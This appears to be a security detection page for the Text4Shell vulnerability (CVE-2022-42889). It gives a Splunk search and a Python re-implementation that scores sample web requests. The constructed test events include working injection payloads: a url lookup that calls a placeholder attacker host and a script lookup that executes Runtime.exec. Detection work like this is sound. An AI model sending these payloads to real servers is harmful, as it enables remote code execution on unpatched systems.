False positives are present when the values for utf and lookup are set to 1. It is possible to raise this to TTP (direct Notable) if other_lookups is removed and the Score threshold is set to 2 (down from 4).

Techniques

Sample rules

Exploit Public Facing Application via Apache Commons Text

Description

The following analytic identifies activity related to Text4Shell, the critical vulnerability CVE-2022-42889 in the Apache Commons Text library. Apache Commons Text versions 1.5 through 1.9 are affected; the issue is patched in version 1.10.0. The analytic may need to be tuned for your environment before it is enabled as a TTP, or direct Notable. Apache Commons Text is a Java library focused on algorithms that work on strings; think of it as a general-purpose text manipulation toolkit. The vulnerability affects the StringSubstitutor interpolator class, which is included in the Commons Text library. The default interpolator allows string lookups that can lead to remote code execution. This is due to a logic flaw that makes the script, dns, and url lookup keys interpolated by default, contrary to what the documentation of the StringLookupFactory class states. Those keys allow an attacker to execute arbitrary code via lookups in attacker-controlled input.

Detection logic


| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.http_method IN (POST, GET) by Web.src Web.status Web.uri_path Web.dest Web.http_method Web.uri_query Web.http_user_agent 
| `drop_dm_object_name("Web")` 
| eval utf=if(like(lower(uri_query),"%:utf-8:http%"),2,0) 
| eval lookup=if(like(lower(uri_query), "%url%") OR like(lower(uri_query), "%dns%") OR like(lower(uri_query), "%script%"),2,0) 
| eval other_lookups=if(like(lower(uri_query), "%env%") OR like(lower(uri_query), "%file%") OR like(lower(uri_query), "%getruntime%") OR like(lower(uri_query), "%java%") OR like(lower(uri_query), "%localhost%") OR like(lower(uri_query), "%properties%") OR like(lower(uri_query), "%resource%") OR like(lower(uri_query), "%sys%") OR like(lower(uri_query), "%xml%") OR like(lower(uri_query), "%base%"),1,0) 
| addtotals fieldname=Score utf lookup other_lookups 
| fields Score src dest status uri_query uri_path http_method http_user_agent firstTime lastTime 
| `security_content_ctime(firstTime)` 
| `security_content_ctime(lastTime)` 
| where Score >= 4 
| `exploit_public_facing_application_via_apache_commons_text_filter`
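To check the scoring before enabling the rule, the following is an added Python re-implementation of the eval and addtotals logic above, run over a handful of constructed web events; it is not the page's or Splunk's own code. The field names follow the Web data model fields the tstats search groups by; the event values, IP addresses and payload strings are made up. The decode option, which URL-decodes uri_query before matching, is an addition the SPL does not perform. The tuned_detect function applies the tuning from the false-positive note at the top of the page (other_lookups dropped, threshold lowered to 2).

```python
"""Offline re-implementation of the Text4Shell scoring in the SPL above,
run over constructed web events so the scoring and its tuning can be checked."""
from collections import defaultdict
from urllib.parse import unquote

# Weighted indicators, mirroring the three eval statements in the SPL.
UTF_PATTERN = ":utf-8:http"                       # utf           -> 2
LOOKUP_KEYS = ("url", "dns", "script")            # lookup        -> 2
OTHER_LOOKUP_KEYS = ("env", "file", "getruntime", "java", "localhost",
                     "properties", "resource", "sys", "xml", "base")  # -> 1

# Fields the tstats search groups by (Web data model, prefix dropped).
GROUP_BY = ("src", "status", "uri_path", "dest", "http_method",
            "uri_query", "http_user_agent")


def score_query(uri_query, weights=(2, 2, 1), decode=False):
    """Score one uri_query the way the SPL does: lower-case, substring match.

    decode=True URL-decodes first. The SPL does not, so this is an added
    assumption used to show how a percent-encoded probe is scored."""
    q = unquote(uri_query) if decode else uri_query
    q = q.lower()
    w_utf, w_lookup, w_other = weights
    utf = w_utf if UTF_PATTERN in q else 0
    lookup = w_lookup if any(k in q for k in LOOKUP_KEYS) else 0
    other = w_other if any(k in q for k in OTHER_LOOKUP_KEYS) else 0
    return {"Score": utf + lookup + other, "utf": utf,
            "lookup": lookup, "other_lookups": other}


def detect(events, threshold=4, weights=(2, 2, 1), decode=False):
    """Group events like the tstats 'by' clause (count, firstTime, lastTime),
    score each group, and return the groups whose Score meets the threshold."""
    groups = defaultdict(lambda: {"count": 0, "firstTime": None, "lastTime": None})
    for ev in events:
        g = groups[tuple(ev[f] for f in GROUP_BY)]
        g["count"] += 1
        t = ev["_time"]
        g["firstTime"] = t if g["firstTime"] is None else min(g["firstTime"], t)
        g["lastTime"] = t if g["lastTime"] is None else max(g["lastTime"], t)
    results = []
    for key, g in groups.items():
        row = dict(zip(GROUP_BY, key), **g)
        row.update(score_query(row["uri_query"], weights, decode))
        if row["Score"] >= threshold:
            results.append(row)
    return results


def tuned_detect(events, decode=False):
    """Tuning from the false-positive note: drop other_lookups, threshold 2."""
    return detect(events, threshold=2, weights=(2, 2, 0), decode=decode)


def _event(t, src, uri_query, path="/search"):
    # Constructed event; only uri_query, src and _time vary between samples.
    return {"_time": t, "src": src, "dest": "10.0.0.5", "status": 200,
            "uri_path": path, "http_method": "GET", "uri_query": uri_query,
            "http_user_agent": "Mozilla/5.0"}


# Constructed sample traffic (hypothetical addresses and payloads).
SAMPLE_EVENTS = [
    _event(1666000000, "203.0.113.10", "search=${url:UTF-8:http://attacker.invalid/}"),
    _event(1666000060, "203.0.113.10", "search=${url:UTF-8:http://attacker.invalid/}"),
    _event(1666000120, "203.0.113.11",
           "name=${script:javascript:java.lang.Runtime.getRuntime().exec('id')}"),
    _event(1666000180, "198.51.100.7", "q=dns+records+for+my+site&page=2"),
    _event(1666000240, "198.51.100.8", "id=42&sort=asc"),
    _event(1666000300, "203.0.113.12",
           "q=%24%7Burl%3AUTF-8%3Ahttp%3A%2F%2Fattacker.invalid%2F%7D"),
]

if __name__ == "__main__":
    for label, rows in (("default (Score >= 4)", detect(SAMPLE_EVENTS)),
                        ("default + decode", detect(SAMPLE_EVENTS, decode=True)),
                        ("tuned (Score >= 2)", tuned_detect(SAMPLE_EVENTS))):
        print(label)
        for r in rows:
            print(f"  {r['src']} count={r['count']} Score={r['Score']} {r['uri_query']}")
```

With the default weights only the `${url:UTF-8:http://...}` group reaches 4 (utf 2 + lookup 2, count 2 across its two requests). The `${script:javascript:...}` variant scores 3 (lookup 2 plus other_lookups 1 for "java" and "getruntime") and is missed because it carries no ":utf-8:http" substring, which is one reason the description says the analytic may need tuning. The tuned variant fires on it, but also on the benign search for "dns records", which is exactly the false-positive trade-off the note describes. The percent-encoded copy of the url payload scores only 2 as indexed and reaches 4 only after decoding, so check whether your web source decodes uri_query before relying on the ":utf-8:http" match.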